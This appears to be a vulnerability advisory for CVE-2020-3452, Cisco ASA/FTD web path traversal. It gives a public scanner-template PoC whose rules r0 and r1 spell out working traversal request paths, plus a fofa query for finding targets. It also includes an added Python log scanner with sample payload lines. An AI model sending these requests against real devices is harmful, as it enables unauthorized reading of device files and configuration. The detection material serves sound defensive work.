CVE-2020-3452: Cisco Read-Only Path Traversal

Date: 2025-09-01 | Affected software: Cisco | PoC: public

Vulnerability description

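The web management interface of firewall devices and Cisco Firepower Threat Defense (FTD) devices has an unauthenticated directory traversal vulnerability that allows remote arbitrary file reads. An attacker can only view files under the web directory and cannot use this vulnerability to access files outside the web directory. The vulnerability can be used to view the webVpn device's configuration information, cookies, and so on. fofa: title="SSL VPN Service"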

PoC code [public]

id: CVE-2020-3452

info:
    name: Cisco Read-Only Path Traversal
    author: 不动明王
    severity: high
    verified: true
    description: |
        防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。
        攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。
        fofa:  title="SSL VPN Service"
    reference:
        - https://zhuanlan.zhihu.com/p/163246632

rules:
    r0:
        request:
            method: GET
            path: /%2bCSCOT%2b/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
            
        expression: response.status == 200 && response.headers["content-type"].contains("application/octet-stream") && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")

    r1:
        request:
            method: GET
            path: /%2bCSCOT%2b/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
        expression: response.status == 200 && response.headers["content-type"].contains("application/octet-stream") && response.body.bcontains(b"INTERNAL_PASSWORD_ENABLED")

expression: r0() || r1()
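
To hunt for the two request shapes that rules r0 and r1 send, the following added example (not part of the original PoC) scans web access logs for them. It assumes combined-log-format lines from a reverse proxy or WAF in front of the device; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Endpoints from rules r0 and r1, percent-decoded and lower-cased.
ENDPOINTS = ("/+cscot+/oem-customization", "/+cscot+/translation-table")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def decode(text, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def is_traversal_probe(target):
    """True when a request target matches the pattern of rules r0/r1."""
    parts = urlsplit(target)
    if not decode(parts.path).lower().startswith(ENDPOINTS):
        return False
    for param in parts.query.split("&"):
        value = decode(param.partition("=")[2]).lower()
        # Assumption: legitimate values are plain names, never dot-dot or portal paths.
        if ".." in value or "+cscoe+" in value:
            return True
    return False

def scan(lines):
    """Return (line number, client, request target) for each suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.match(line)
        if match and is_traversal_probe(match.group(2)):
            hits.append((number, match.group(1), match.group(2)))
    return hits

# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2025:10:00:01 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Sep/2025:10:00:02 +0000] "GET /%2bCSCOT%2b/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Sep/2025:10:00:03 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&lang=en-us HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Sep/2025:10:00:04 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Sep/2025:10:00:05 +0000] "GET /%252bCSCOT%252b/translation-table?type=mst&textdomain=AnyConnect&lang=%252e%252e/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, client, target in scan(SAMPLE_LOG):
        print(f"line {number}: {client} requested {target}")
```

A hit with status 200 and an `application/octet-stream` response, as the rule expressions check, indicates the file was actually returned rather than merely requested.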
